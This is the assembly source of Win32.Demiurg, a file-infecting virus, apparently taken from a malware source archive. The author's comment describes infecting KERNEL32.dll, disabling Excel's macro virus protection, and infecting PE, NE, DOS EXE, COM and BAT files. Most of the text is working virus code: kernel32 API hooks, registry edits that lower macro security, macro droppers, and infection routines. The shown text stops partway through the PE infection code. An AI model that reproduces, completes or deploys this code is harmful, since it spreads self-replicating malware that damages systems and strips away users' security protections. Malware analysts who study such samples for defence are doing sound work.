MalwareSourceCode/Win32/Infector/Win32.Demiurg.asm
2020-10-16 23:26:21 +02:00

3634 lines
147 KiB
NASM
Raw Blame History

; *************************************************************************
; ******************** ********************
; ******************** Win32.Demiurg ********************
; ******************** by ********************
; ******************** Black Jack ********************
; ******************** ********************
; *************************************************************************
comment ~
NAME: Win32.Demiurg
AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
TYPE: Win32 global resident (in kernel32.dll) PE/NE/MZ/COM/BAT/XLS infector
SIZE: 16354 bytes
DESCRIPTION:
The main instance of the virus is in infected PE EXE files (or the PE
dropper). If such a file is executed, the first thing the virus does is
getting the needed API addresses by standart methods (first it scans the
hosts import table for the GetModuleHandleA API and uses it to get the
KERNEL32 handle if found, if not, it gets it by the "scan down from the
value from the top of stack"-trick, then the export table of KERNEL32 is
scanned for all needed APIs, finally also ADVAPI32.dll is loaded and some
APIs for registry operations fetched from there). Then the virus performs
two tasks before returning to the host: first infected KERNEL32.dll, then
infected MS-Excel.
To infect KERNEL32.dll, it is copied from the system directory to the windows
directory and infected there. The infection process is the same as with
regular PE EXE files (see later), but not the main entry point is modified,
but some file modification APIs are hooked (to maintain compatiblity to WinNT
in both their ANSI and unicode versions). To replace the old KERNEL32.dll
with the infected copy, the virus uses the MoveFileExA API with the
MOVEFILE_DELAY_UNTIL_REBOOT flag; this will only work in WinNT, but this
doesn't matter, because Win9x will use the copy in the windows directory
rather than the one in the system directory after the next reboot anyways.
To infect Excel, the virus checks the registry if a supported version (97 or
2000) is installed; if so, it turns the macro virus protection off and gets
the path where it is installed. Then it drops a .xls file with a little macro
as \xlstart\demiurg.xls; this file will be loaded automatically at the next
start of excel, and the macro executed. Besides that, another macro source
code is generated as C:\demiurg.sys file, that contains VBA instructions to
write the virus PE dropper to C:\demiurg.exe and execute it. Please note that
this macro uses 100% VBA instructions (the binary data is stored in Arrays),
no stupid debug scripts. This file will be used to infect regular .xls files
with. This means that the VBA instance of the virus is not a "full" macro
virus, because it is not able to replicate from one .xls file to another
directly.
After the KERNEL32.dll infection, the virus will stay resident after the next
reboot. It then catches most file API functions and infects COM, EXE (MZ, NE,
PE) and BAT files as they are accessed.
The PE EXE infection process is quite standart: The last section is increased,
and the virus body is appended after the virtual end of the section. In my
opinion this is much more logical than appending after the physical end, how
it is done in most Win32 virii nowadays, because otherwise the virus body can
be overwritten by host data (if the last section is the .bss section, for
example). Besides that the virtual size is not aligned (although some
compilers/assemblers like TASM align it to SectionAlign, this is not
necessary), while the physical size is always aligned to FileAlign; this
means we can save some space in some cases. Then the entry point is set to
the virus body (in case of PE EXE files) and finally also the imagesize and
the checksum (in case it was different to zero before infection) are updated
to maintain compatiblity to WinNT; to recalculate the CRC the
CheckSumMappedFile API from IMAGEHLP.dll is used.
All other infectable files are only infected "indirectly": A small piece of
code is added that drops a PE dropper and infects it. Because of that the
virus can only replicate in Win32 enviroments, although it infects a lot of
different filetypes.
DOS EXE files are also infected in standart manner: some code is appended at
the end of file, then the entrypoint and the stack are set to it, and the
internal filesize is recalculated. Sligtly interesting is that the virus is
able to infect files with internal overlays that were generated with borland
compilers, in this case the virus is appended between the internal end of the
file and the overlay, after the overlay has been shifted back. This works
very fine (to my own surprise); try to infect TD.EXE for example.
COM files are infected by internally converting them to EXE files by
prepending a small EXE header, and then infected just like a DOS EXE file.
Of course the virus is also able to deal with ENUNS files, in this case the
ENUNS signature is threated just like an internal overlay.
BAT files are infected by adding some BAT code at the end of the file, then
the the character 1Ah (end of text file; BAT files will be only executed
until this character is reached), and after that the PE dropper. The BAT code
works by ECHOing out a small COM file (which was been written in such a
careful way that it only contains characters that are legit in BAT files) to
C:\DEMIURG.EXE. Then this file is executed with the name of the BAT file as
parameter. Then the COM file reads the PE dropper from the end of the BAT
file and writes it to C:\DEMIURG.EXE too, and then executes the new file.
NE files are infected with the method that was introduced by Mark Ludwig (I
think): The code segment that contains the entry point is increased, the rest
of the file is shifted back and the NE header tables are fixed to reflect the
new layout of the file. Then a small piece of code is injected into the newly
gained room and the entrypoint set to it; besides that the PE dropper is
appended at the end of the file as internal overlay.
ASSEMBLE WITH:
tasm32 /mx /m demiurg.asm
tlink32 /Tpe /aa demiurg.obj,,, import32.lib
there's no need for PEWRSEC or a similar tool, because the
virus code is stored in the data section.
DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
Therefore, this source was only written for research and
education. Please do not spread it. The author can't be hold
responsible for what you decide to do with this source.
~
; ===========================================================================
workspace EQU 100000
virus_size EQU (virus_end-start)
Extrn ExitProcess:Proc
Extrn MessageBoxA:Proc
.386
.model flat
.data
start:
db 68h ; push imm32
orig_eip dd offset dummy_host ; push host entry point
pushfd ; save flags
pushad ; save all registers
call delta ; get delta offset
delta:
pop ebp
sub ebp, offset delta
; ----- GET KERNEL32 IMAGE BASE ---------------------------------------------
db 0B8h ; mov eax, imm32
imagebase dd 400000h ; EAX=imagebase of host
mov ebx, [eax+3Ch] ; EBX=new exe pointer RVA
add ebx, eax ; EBX=new exe pointer VA
mov ebx, [ebx+128] ; EBX=import directory RVA
add ebx, eax ; EBX=import directory VA
search_kernel32_descriptor:
mov esi, [ebx+12] ; ESI=name of library RVA
or esi, esi ; last import descriptor ?
JZ failed ; if yes, we failed
add esi, eax ; ESI=name of library VA
lea edi, [ebp+offset kernel32name] ; EDI=name of kernel32 VA
mov ecx, 8 ; ECX=length to compare
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_kernel32_descriptor ; if equal, we found it
add ebx, 20 ; next import descriptor
JMP search_kernel32_descriptor ; search on
found_kernel32_descriptor:
xor edx, edx ; EDX=0 - our counter
push dword ptr [ebx+16] ; RVA of array of API RVAs
mov ebx, [ebx] ; EBX=array of API name ptrs
or ebx, ebx ; are there APIs imported ?
JZ pop_failed ; if not, we failed
add ebx, eax ; EBX=RVA API name ptrs array
search_GetModuleHandle:
mov esi, [ebx] ; ESI=RVA of a API name
or esi, esi ; searched all API names?
JZ pop_failed ; if yes, we failed
test esi, 80000000h ; is it an ordinal ?
JNZ next_API ; can't handle ordinal imports
add esi, eax ; ESI=VA of API name
inc esi ; skip the ordinal hint
inc esi
lea edi, [ebp+offset GetModuleHandleA] ; EDI=VA of GetModuleHandleA
mov ecx, l_GMH ; ECX=length GetModuleHandleA
cld ; clear direction flag
rep cmpsb ; compare the two strings
JE found_GetModuleHandle
next_API:
inc edx ; increment our API counter
inc ebx ; EBX=ptr to next API name ptr
inc ebx
inc ebx
inc ebx
JMP search_GetModuleHandle ; try next API name
found_GetModuleHandle:
pop ebx ; EBX=RVA of array of API RVAs
add ebx, eax ; EBX=VA of array of API RVAs
mov ebx, [ebx+edx*4] ; EBX=GetModuleHandleA entry
lea edx, [ebp+offset kernel32name] ; EDX=pointer to KERNEL32.dll
push edx ; push it
call ebx ; call GetModuleHandleA
or eax, eax ; got kernel32 handle/base ?
JNZ found_kernel32 ; if yes, we got it!
JMP failed ; otherwise, try other method
pop_failed:
pop ebx ; remove shit from stack
failed: ; import method failed? then
; try memory scanning method
mov ebx, [esp+10*4] ; EBX=address inside kernel32
kernel32find:
cmp dword ptr [ebx], "EP" ; found a PE header?
JNE search_on_kernel32 ; if not, search on
mov eax, [ebx+34h] ; EAX=module base address
or al, al ; is it on a page start?
JNZ search_on_kernel32 ; if not, search on
cmp word ptr [eax], "ZM" ; is there a MZ header?
JE found_kernel32 ; if yes, we found kernel32!
search_on_kernel32:
dec ebx ; go one byte down
JMP kernel32find ; and search on
found_kernel32:
mov [ebp+offset kernel32], eax ; saver kernel32 base address
lea esi, [ebp+offset kernel32_API_names_table] ; get APIs from
lea edi, [ebp+offset kernel32_API_address_table]; KERNEL32.dll
mov ecx, number_of_kernel32_APIs
call GetAPIs
lea eax, [ebp+offset advapi32_dll] ; load ADVAPI32.dll
push eax
call [ebp+offset LoadLibraryA]
lea esi, [ebp+offset advapi32_API_names_table] ; get APIs from
lea edi, [ebp+offset advapi32_API_address_table]; ADVAPI32.dll
mov ecx, number_of_advapi32_APIs
call GetAPIs
call infect_kernel32
call infect_excel
popad ; restore registers
popfd
ret ; return to host
; ----- END MAIN ROUTINE OF THE VIRUS ---------------------------------------
copyright db "[The Demiurg] - a Win32 virus by Black Jack", 0
db "written in Austria in the year 2000", 0
; ----- INFECT KERNEL32.DLL -------------------------------------------------
infect_kernel32:
mov eax, [ebp+SetFileAttributesA] ; if we're already resident,
sub eax, [ebp+GetFileAttributesA] ; we know the difference
cmp eax, 2*API_hook_size ; between the two API entries:
JE kernel32_infect_failure ; so don't reinfect kernel32.
push 260
lea eax, [ebp+offset path_buffer1]
push eax
call [ebp+offset GetSystemDirectoryA] ; get the Windows System dir
lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string
push eax
lea eax, [ebp+offset path_buffer1]
push eax
call [ebp+offset lstrcatA]
push 260 ; get the Windows directory
lea eax, [ebp+offset path_buffer2]
push eax
call [ebp+offset GetWindowsDirectoryA]
lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string
push eax
lea eax, [ebp+offset path_buffer2]
push eax
call [ebp+offset lstrcatA]
push 1 ; don't overwrite target
lea eax, [ebp+offset path_buffer2] ; target
push eax
lea eax, [ebp+offset path_buffer1] ; source
push eax
call [ebp+offset CopyFileA] ; copy kernel32.dll from
; system to windows directory
or eax, eax
JZ kernel32_infect_failure
lea edx, [ebp+offset path_buffer2] ; open and map the KERNEL32.dll
call openfile ; in the windows directory
mov ebx, eax
add ebx, [eax+3Ch] ; EBX=kernel32 PE header
push ebx ; save the PE header offset
call append_PE ; infect KERNEL32.dll
pop ebx ; EBX=Kernel32 PE header
mov ecx, number_of_hooked_APIs ; ECX=number of APIs to hook
lea esi, [ebp+offset hooked_API_names_table] ; ESI=names of APIs
mov edi, (API_hooks - start) ; EDI=first API hook relative
; to virus start
hook_APIs_loop:
call hook_API ; hook this API
mov eax, esi ; EAX=API name address
next_hook_API_loop:
inc eax ; search end of string
cmp byte ptr [eax+1], 0
JNE next_hook_API_loop
cmp byte ptr [eax], "A" ; ANSI version of API?
JNE next_API_name
mov byte ptr [eax], "W" ; hook also unicode version
push eax
call hook_API
pop eax
mov byte ptr [eax], "A" ; restore ANSI version name
next_API_name:
inc eax ; EAX=next API name
inc eax
xchg esi, eax ; ESI=next API name
LOOP hook_APIs_loop ; hook next API
finish_kernel32_infection:
mov dword ptr [ebx+8], 666 ; destroy kernel32 build time
call finish_PE_infection ; append virus body and
; recalculate checksum
call closemap ; close map and file
push 5 ; flags for MoveFileExA
; MOVEFILE_REPLACE_EXISTING +
; MOVEFILE_DELAY_UNTIL_REBOOT
lea eax, [ebp+offset path_buffer1] ; target
push eax
lea eax, [ebp+offset path_buffer2] ; source
push eax
call [ebp+offset MoveFileExA] ; NOTE: This API call will
; only work in WinNT. But this
; is no problem, because Win9X
; will prefer the kernel32.dll
; in the Windows directory to
; the one in the System
; directory anyways.
kernel32_infect_failure:
RET
; ----- HOOK ONE API --------------------------------------------------------
hook_API:
push ebx ; save registers
push ecx
push esi
push ebx ; save EBX (PE hdr in memmap)
push edi ; save EDI (hook "RVA")
mov eax, [ebp+offset kernel32] ; EAX=KERNEL32 base address
call My_GetProcAddress
; EDX=RVA of RVA of API in
; export table
mov ecx, [edx+eax] ; ECX=API RVA
add ecx, eax ; ECX=API VA
pop edi ; EDI="RVA" of API hook
pop ebx ; EBX=K32 PE header in memmap
mov [edi+ebp+offset start+1], ecx ; store original API VA
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
movzx eax, word ptr [ebx+14h] ; size of optional header
lea ebx, [eax+ebx+18h] ; EBX=first section header
; 18h = size of file header
search_section:
mov esi, [ebx+0Ch] ; ESI=section RVA
cmp esi, edx
JA next_section
add esi, [ebx+8] ; add section virtual size
cmp esi, edx
JA found_section
next_section:
add ebx, 40 ; 40 = section header size
LOOP search_section
section_not_found:
JMP exit_hook_API
found_section:
sub edx, [ebx+0Ch] ; section RVA
add edx, [ebx+14h] ; start of raw data
; EDX=physical offset of
; API RVA in K32 export table
add edx, [ebp+offset mapbase] ; EDX=address in memmap
mov eax, edi
add eax, [ebp+offset virus_RVA] ; EAX=API hook RVA in K32
mov [edx], eax ; hook API
exit_hook_API:
add edi, API_hook_size ; EDI=next API hook
pop esi
pop ecx
pop ebx
RET
; ----- HOOKS FOR APIs ------------------------------------------------------
API_hooks:
CreateFileA_hook:
push 12345678h
JMP hookA
API_hook_size EQU ($ - offset CreateFileA_hook)
CreateFileW_hook:
push 12345678h
JMP hookW
GetFileAttributesA_hook:
push 12345678h
JMP hookA
GetFileAttributesW_hook:
push 12345678h
JMP hookW
SetFileAttributesA_hook:
push 12345678h
JMP hookA
SetFileAttributesW_hook:
push 12345678h
JMP hookW
CopyFileA_hook:
push 12345678h
JMP hookA
CopyFileW_hook:
push 12345678h
JMP hookW
MoveFileExA_hook:
push 12345678h
JMP hookA
MoveFileExW_hook:
push 12345678h
JMP hookW
MoveFileA_hook:
push 12345678h
JMP hookA
MoveFileW_hook:
push 12345678h
JMP hookW
_lopen_hook:
push 12345678h
hookA:
pushf
pusha
call hookA_next
hookA_next:
pop ebp
sub ebp, offset hookA_next
mov edi, [esp+11*4]
call infect
popa
popf
RET
hookW:
pushf
pusha
call hookW_next
hookW_next:
pop ebp
sub ebp, offset hookW_next
mov esi, [esp+11*4]
lea edi, [ebp+offset path_buffer1]
push edi
push 0 ; useless default character
push 0 ; useless default character
push 260 ; length of destination buffer
push edi ; offset of destination buffer
push -1 ; find length automatically
push esi ; address of source buffer
push 0 ; no special flags
push 0 ; codepage: CP_ACP (ANSI)
call dword ptr [ebp+WideCharToMultiByte]
or eax, eax
JZ WideCharToMultiByte_failed
pop edi
call infect
WideCharToMultiByte_failed:
popa
popf
RET
; ----- INFECT EXCEL --------------------------------------------------------
infect_excel:
mov [ebp+office_version_number], "8" ; first try Excel97 (v8.0)
try_excel:
; Open the RegKey with the
; MS-Excel Options
lea eax, [ebp+offset reg_handle1] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset regkey] ; which regkey
push eax
push 80000001h ; HKEY_CURRENT_USER
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JZ found_excel
cmp [ebp+office_version_number], "9" ; already tried both versions?
JE failure ; no excel found, we failed
inc [ebp+office_version_number] ; try also Excel2000
JMP try_excel
found_excel:
cmp [ebp+office_version_number], "9" ; which version found ?
JE unprotect_Excel2K
unprotect_Excel97:
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 2 ; access: KEY_SET_VALUE
push 0 ; reserved
lea eax, [ebp+offset subkey_97] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JNZ failure
mov dword ptr [ebp+offset regvalue_dword], 0 ; 0 means Macro virus
; protection off
lea edx, [ebp+offset regvalue_options] ; offset value name
JMP general_unprotect
unprotect_Excel2K:
lea eax, [ebp+offset regvalue_dword] ; disposition (uninteresting)
push eax
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 0 ; security attributes
push 6 ; access: KEY_SET_VALUE and
; KEY_CREATE_SUB_KEY
push 0 ; REG_OPTION_NON_VOLATILE
push 0 ; address of class string
push 0 ; reserved
lea eax, [ebp+offset subkey_2K] ; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; registry handle
call [ebp+RegCreateKeyExA]
or eax, eax
JNZ failure
mov dword ptr [ebp+offset regvalue_dword], 1 ; 1 - lowest level of
; macro security
lea edx, [ebp+offset regvalue_2K] ; offset value name
general_unprotect:
; Now disable the MS-Excel
; macro virus protection.
push 4 ; size of buffer
lea eax, [ebp+offset regvalue_dword] ; address of buffer
push eax
push 4 ; REG_DWORD
push 0 ; reserved
push edx ; offset value name
push [ebp+reg_handle2] ; reg handle
call [ebp+offset RegSetValueExA]
or eax, eax
JNZ failure
push [ebp+reg_handle2] ; Close the RegKey again
call [ebp+offset RegCloseKey]
or eax, eax
JNZ failure
push [ebp+reg_handle1] ; Close the RegKey again
call [ebp+offset RegCloseKey]
or eax, eax
JNZ failure
; Open the RegKey where we
; will find the path to Excel
lea eax, [ebp+offset reg_handle1] ; offset registry handle
push eax
push 1 ; access: KEY_QUERY_VALUE
push 0 ; reserved
lea eax, [ebp+offset regkey] ; which regkey
push eax
push 80000002h ; HKEY_LOCAL_MACHINE
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JNZ failure
lea eax, [ebp+offset reg_handle2] ; offset registry handle
push eax
push 1 ; access: KEY_QUERY_VALUE
push 0 ; reserved
lea eax, [ebp+offset subkey_InstallRoot]; which regkey
push eax
push dword ptr [ebp+offset reg_handle1] ; reg handle
call [ebp+offset RegOpenKeyExA]
or eax, eax ; success=>EAX=0
JNZ failure
; Get the path where MS-Excel
; is installed
lea eax, [ebp+offset size_buffer] ; address of data buffer size
mov dword ptr [eax], 260 ; set size of data buffer
push eax
lea eax, [ebp+offset path_buffer1] ; address of data buffer
push eax
lea eax, [ebp+offset REG_SZ] ; address of buffer for value
push eax ; type (ASCIIZ string)
push 0 ; reserved
lea eax, [ebp+offset regvalue_path] ; address of name of value
push eax ; to query
push [ebp+reg_handle2] ; handle of RegKey to query
call [ebp+offset RegQueryValueExA]
or eax, eax
JNZ failure
push [ebp+reg_handle1] ; close the RegKey
call [ebp+offset RegCloseKey]
or eax, eax
JNZ failure
push [ebp+reg_handle2] ; close the RegKey
call [ebp+offset RegCloseKey]
or eax, eax
JNZ failure
lea eax, [ebp+offset demiurg_xls] ; add "\xlstart\demiurg.xls"
push eax ; (our macro dropper file)
lea eax, [ebp+offset path_buffer1] ; to the Excel path
push eax
call [ebp+offset lstrcatA]
lea edx, [ebp+offset path_buffer1] ; create this file
call createfile
JC failure
lea esi, [ebp+offset macro_dropper] ; decompress our macro dropper
mov edi, eax ; file to the filemap
mov ebx, macro_dropper_size
call decompress
mov dword ptr [ebp+filesize], 16384 ; filesize of macro dropper
call closemap ; close the macro dropper file
push dropper_size ; allocate memory where we can
push 0 ; create the PE virus dropper
call [ebp+offset GlobalAlloc]
or eax, eax
JZ failure
mov [ebp+heap_buffer], eax ; save memory base address
xchg edi, eax ; EDI=address of allocated mem
call create_dropper
lea edx, [ebp+offset macro_filename] ; create the file for the
call createfile ; macro dropper code source
JC failure ; that will be used to infect
; excel files
xchg edi, eax ; EDI=base of memmap
lea esi, [ebp+offset main_macro_code] ; copy main VBA code to there
mov ecx, main_macro_code_size
cld
rep movsb
mov byte ptr [ebp+sub_name], "b" ; name of the first VBA sub
mov esi, [ebp+heap_buffer] ; ESI=PE dropper image in mem
mov ecx, (dropper_size / 128) ; ECX=number of a=Array(...)
; lines that are left
build_subs_loop:
push esi ; save ESI
lea esi, [ebp+offset sub_header] ; copy "Sub b()"
movsd ; move 9 bytes
movsd
movsb
pop esi ; restore ESI
mov eax, (((dropper_size / 128)+5)/6) ; number of lines in one sub
cmp ecx, eax ; last sub?
JB push_0 ; ECX=0 afterwards (no more
; lines left)
sub ecx, eax ; otherwise ECX=number of
; lines left
push ecx ; save it
mov ecx, eax ; ECX=nr. of lines in one sub
JMP build_lines_loop
push_0:
push 0
build_lines_loop:
push ecx ; save number of lines left
mov eax, "rA=a" ; add string "a=Array("
stosd
mov eax, "(yar"
stosd
mov ecx, 128 ; ECX=numbers in one line
build_nubers_loop:
push ecx ; save ECX
xor eax, eax ; EAX=0
lodsb ; AL=one byte from dropper
mov ecx, 3 ; ECX=3 (nuber of digits)
number_loop_head:
xor edx, edx ; EDX=0 (high dword for div)
mov ebx, 10 ; EBX=10
div ebx ; EDX=mod, EAX=div
add dl, '0' ; DL=one digit
push edx ; save it
LOOP number_loop_head
pop eax ; AL=one digit
stosb ; store it
pop eax ; AL=next digit
stosb
pop eax
stosb
mov al, ',' ; store a comma
stosb
pop ecx ; ECX=number of bytes left
LOOP build_nubers_loop
dec edi
mov eax, ")" + 0A0D00h + "w"*1000000h ; add ")CRLFwCRLF"
stosd
mov ax, 0A0Dh
stosw
pop ecx ; restore number of lines left
LOOP build_lines_loop
push esi ; save ESI
lea esi, [ebp+offset end_sub] ; store an "end sub"
movsd ; move 9 bytes
movsd
movsb
pop esi ; restore ESI
inc byte ptr [ebp+sub_name] ; new name for next sub
pop ecx ; ECX=number of lines left
or ecx, ecx
JNZ build_subs_loop
sub edi, [ebp+mapbase] ; EDI=size of VBA code
mov [ebp+filesize], edi ; save it as filesize
call closemap ; close the map/file
push [ebp+heap_buffer] ; free allocated memory
call [ebp+GlobalFree]
failure:
RET
; ----- INFECT FILE ---------------------------------------------------------
infect:
push edi
xor eax, eax ; EAX=0
mov ecx, eax ; ECX=0
dec ecx ; ECX=0FFFFFFFFh
cld ; clear direction flag
repne scasb ; search for end of filename
mov eax, [edi-5] ; EAX=filename extension
or eax, 20202020h ; make it lowercase
pop edx
cmp eax, "exe." ; EXE file?
JE infect_exe_com
cmp eax, "moc." ; COM file?
JE infect_exe_com
cmp eax, "tab." ; BAT file?
JNE quit_infect_error
; ----- INFECT BAT FILE -----------------------------------------------------
infect_bat:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
xchg edi, eax ; EDI=start of memmap
add edi, [ebp + offset filesize] ; EDI=end of file in memmap
cmp byte ptr [edi-1], 0 ; already infected?
JE already_infected
lea esi, [ebp + offset bat_virus_code] ; ESI=BAT code to add
mov ecx, size_bat_virus_code
cld
rep movsb ; add BAT code
call create_dropper ; add PE dropper as overlay
add dword ptr [ebp + offset filesize], (size_bat_virus_code+dropper_size)
JMP abort_infection
; ----- INFECT A EXE OR COM FILE --------------------------------------------
infect_exe_com:
call openfile ; open and map the victim
JC quit_infect_error ; opening/mapping failed ?
cmp word ptr [eax], "ZM" ; has it a MZ header?
JE infect_exe
cmp word ptr [eax], "MZ" ; has it a MZ header?
JE infect_exe
; ----- INFECT COM FILE -----------------------------------------------------
infect_com:
mov ecx, [ebp+offset filesize] ; ECX=size of victim file
mov esi, ecx
dec esi
add esi, [ebp+offset mapbase] ; ESI=end of file in memmap
mov edi, esi
add edi, 32
std
rep movsb ; shift whole file back
lea esi, [ebp+offset new_mz_header] ; prepend the MZ header
mov edi, [ebp+offset mapbase]
mov ebx, new_mz_header_size
call decompress
mov eax, [ebp+offset filesize] ; update filesize
add eax, 32
mov [ebp+filesize], eax
mov ebx, [ebp+offset mapbase]
cmp word ptr [eax+ebx-4], "SN" ; ENUNS check
JNE no_enun
add word ptr [eax+ebx-2], 1234h ; fix ENUNS shit
org $-2 ; otherwise TASM will give a
dw (((size_dos_virus_code+15+dropper_size)/16)*16); warning, dunno why
sub eax, 7 ; make the ENUNS an overlay
no_enun:
xor edx, edx ; calculate filesize for
mov ecx, 512 ; MZ header
div ecx
or edx, edx ; mod
JZ no_page_roundup
inc eax ; div
no_page_roundup:
mov [ebx+2], edx
mov [ebx+4], eax
xchg eax, ebx
; now infect it as regular EXE
; ----- EXE FILE INFECTION --------------------------------------------------
infect_exe:
cmp word ptr [eax+12h], "JB" ; already infected?
JE already_infected
mov word ptr [eax+12h], "JB" ; mark as infectd
cmp word ptr [eax+18h], 40h
JE new_exe
; ----- DOS EXE INFECTION ---------------------------------------------------
dos_exe:
mov bx, [eax+0Eh] ; save relo_SS
mov [ebp+relo_SS], bx
mov bx, [eax+10h] ; save SP_start
mov [ebp+SP_start], bx
mov bx, [eax+14h] ; save IP_start
mov [ebp+IP_start], bx
mov bx, [eax+16h] ; save relo_CS
mov [ebp+relo_CS], bx
movzx ebx, word ptr [eax+2] ; calculate internal filesize
movzx ecx, word ptr [eax+4]
or ebx, ebx
JZ no_page_round
dec ecx
no_page_round:
mov eax, 512
mul ecx
add eax, ebx
mov [ebp+offset dos_exe_size], eax
cmp [ebp+offset filesize], eax ; has it an internal overlay?
JE no_internal_overlays
with_overlay:
mov esi, [ebp+offset mapbase]
cmp dword ptr [eax+esi], "VOBF" ; internal overlay of borland?
JE infectable_overlay
cmp word ptr [eax+esi+3], "SN" ; ENUNS COM file converted
; by us before?
JNE abort_infection
infectable_overlay:
mov ecx, [ebp+filesize] ; shift internal overlay back
mov esi, ecx
sub ecx, eax
dec esi
add esi, [ebp+mapbase]
mov edi, esi
add edi, (((size_dos_virus_code+15+dropper_size)/16)*16)
std
rep movsb
no_internal_overlays:
add dword ptr [ebp+filesize], (((size_dos_virus_code+15+dropper_size)/16)*16)
add dword ptr [ebp+dos_exe_size], (((size_dos_virus_code+15+dropper_size)/16)*16)
mov ebx, [ebp+mapbase]
mov edi, eax
add edi, ebx
lea esi, [ebp+offset dos_virus_code]
mov ecx, size_dos_virus_code
cld
rep movsb
call create_dropper
xor edx, edx
mov ecx, 16
div ecx ; EDX:EAX / ECX
; EAX=DIV, EDX=MOD
sub ax, [ebx+08h] ; size of header (paragr)
; EAX=virus segment
mov word ptr [ebx+0Eh], ax ; new relo_SS
mov word ptr [ebx+10h], 6000h ; new SP_start
mov word ptr [ebx+14h], dx ; new IP_start
mov word ptr [ebx+16h], ax ; new relo_CS
mov eax, [ebp+dos_exe_size]
xor edx, edx
mov ecx, 512
div ecx
or edx, edx ; mod
JZ no_page_roundup_
inc eax ; div
no_page_roundup_:
mov [ebx+2], dx
mov [ebx+4], ax
JMP abort_infection
; ----- IT IS A NEW EXE FILE ------------------------------------------------
new_exe:
mov ebx, [eax+3Ch] ; EBX=new header offset
add ebx, eax ; EBX=new header in memmap
cmp dword ptr [ebx], "EP" ; PE file?
JE infect_PE
cmp word ptr [ebx], "EN" ; NE file?
JNE abort_infection
; ----- INFECT A NE EXE FILE ------------------------------------------------
infect_NE:
mov edi, [ebp+offset filename_ofs]
mov esi, edi
search_pure_filename:
cmp byte ptr [edi], "\"
JNE no_backslash
mov esi, edi
no_backslash:
cmp byte ptr [edi], 0
JE found_end_filename
inc edi
JMP search_pure_filename
found_end_filename:
inc esi
lea edi, [ebp+offset our_filename]
cld
movsd
movsd
movsd
xchg ebx, eax
mov cx, [eax+32h] ; CX=align shift
or cx, cx ; align shift zero?
JNZ align_ok ; if not, it's alright
mov cx, 9 ; if so, use default (512 byt)
align_ok:
or ch, ch ; alignment too big?
JNZ abort_infection ; if so, then close
mov [ebp+offset shift_value], cl ; store align shift value
mov [ebp+offset shift_value2], cl ; store again shift value
mov ebx, size_NE_virus_code ; EBX=virus length
shr ebx, cl
inc ebx ; EBX=aligned length
shl ebx, cl
movzx esi, word ptr [eax+24h] ; ESI=resource table in file
add esi, eax ; ESI=resource table in map
cmp cx, [esi] ; file align=resource align?
JNE abort_infection ; if not, then close
inc esi ; esi=1st TypeInfo
inc esi
mov [ebp+offset resource_table], esi ; save start of resource table
movzx edx, word ptr [eax+16h] ; EDX=number of code sect.
dec edx ; count starts with one
shl edx, 3 ; 1 sect. header=8 bytes
movzx ecx, word ptr [eax+22h] ; ECX=start of segment table
add edx, ecx ; EDX=segment header in file
add edx, eax ; EDX=segment header of start
; code segment in mapped mem
movzx ecx, word ptr [edx+2] ; ECX=segment size in file
or ecx, ecx ; 64K segment?
JZ abort_infection ; if so, exit
cmp [edx+6], cx ; cmp with size in mem
JNE abort_infection ; exit if not equal
push word ptr [eax+14h] ; save old start ip
pop word ptr [ebp+offset NE_start_IP]
mov [eax+14h], cx ; set new one
add [edx+2], bx ; fixup physical segment size
add [edx+6], bx ; fixup virtual segment size
movzx edi, word ptr [edx] ; start of segment in file
push ecx
mov cl, [ebp+offset shift_value]
shl edi, cl ; start of segment in bytes
pop ecx
add edi, ecx ; add size of segment
mov esi, [ebp+offset filesize]
mov ecx, esi
sub ecx, edi ; length to move
dec esi
add esi, [ebp+offset mapbase]
push edi ; save virus start
add [ebp+offset filesize], ebx ; fixup filesize
mov edi, esi
add edi, ebx
std
rep movsb
pop edi
push edi
add edi, [ebp+offset mapbase]
lea esi, [ebp+offset NE_virus_code]
mov ecx, ebx
cld
rep movsb
pop edx ; EDX=virus start in file
mov cl, [ebp+offset shift_value]
shr ebx, cl ; EBX=virus size in alignment units
movzx esi, word ptr [eax+22h] ; start of segment table
add esi, eax ; ESI=segment table in map
movzx ecx, word ptr [eax+1Ch] ; ECX=number of segments
segment_loop_head:
movzx eax, word ptr [esi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value db ?
cmp eax, edx ; resource ofs > virus start?
JL segment_ok
add word ptr [esi], bx ; fix up resource offset
segment_ok:
add esi, 8
LOOP segment_loop_head
mov esi, [ebp+offset resource_table]
resources_loop_head:
cmp word ptr [esi], 0 ; end of TypeInfo table?
JE done_resources
movzx ecx, word ptr [esi+2] ; Resource count
lea edi, [esi+8] ; NameInfo Array
NameInfo_loop_head:
movzx eax, word ptr [edi] ; EAX=offset of resource
db 0C1h, 0E0h ; shl eax, imm8
shift_value2 db ?
cmp eax, edx ; resource ofs > virus start?
JL resource_ok
add word ptr [edi], bx ; fix up resource offset
resource_ok:
add edi, 12
LOOP NameInfo_loop_head
mov esi, edi
JMP resources_loop_head
done_resources:
mov edi, [ebp + offset mapbase]
add edi, [ebp + offset filesize]
call create_dropper
add dword ptr [ebp + offset filesize], dropper_size
JMP abort_infection
; ----- INFECT A PE EXE FILE ------------------------------------------------
infect_PE:
push ebx ; save PE header pointer
call append_PE ; modify last sect. for virus
mov ebx, [ebp+offset virus_RVA] ; EBX=RVA of virus in victim
xchg ebx, [eax+28h] ; set as new entrypoint, save
; old entryRVA in EBX
mov ecx, [eax+34h] ; ECX=imagebase
mov [ebp+offset imagebase], ecx ; save it
add ebx, ecx ; EBX=entry VA
mov [ebp+orig_eip], ebx ; save it
pop ebx ; EBX=PE header pointer
